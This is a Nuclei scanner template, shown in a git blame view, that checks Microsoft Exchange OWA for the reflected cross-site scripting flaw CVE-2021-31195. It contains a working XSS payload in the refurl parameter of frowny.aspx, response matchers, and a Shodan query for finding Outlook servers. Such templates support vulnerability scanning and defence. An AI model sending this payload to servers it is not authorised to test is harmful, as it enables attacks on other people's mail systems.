nuclei-templates/http/cves/2021/CVE-2021-31195.yaml

49 lines
1.5 KiB
YAML
Raw Normal View History

id: CVE-2021-31195
info:
name: Microsoft Exchange Server - Cross-Site Scripting
author: infosecsanyam
2023-08-31 11:46:18 +00:00
severity: medium
description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.
reference:
- https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195
- https://nvd.nist.gov/vuln/detail/CVE-2021-31195
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-31195
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.94276
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.98858
2022-07-04 08:46:15 +00:00
metadata:
max-request: 1
2022-07-04 08:46:15 +00:00
shodan-query: http.title:"Outlook"
2023-07-11 19:49:27 +00:00
vendor: microsoft
product: exchange_server
2022-01-13 05:19:53 +00:00
tags: microsoft,exchange,owa,xss
http:
- method: GET
path:
- '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'
matchers-condition: and
matchers:
- type: word
words:
2021-08-17 10:22:22 +00:00
- 'alert(document.domain)//&et=ServerError'
- 'mail/bootr.ashx'
2021-08-17 09:30:05 +00:00
condition: and
2021-08-17 09:30:05 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-08-17 09:30:05 +00:00
words:
- "text/html"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 500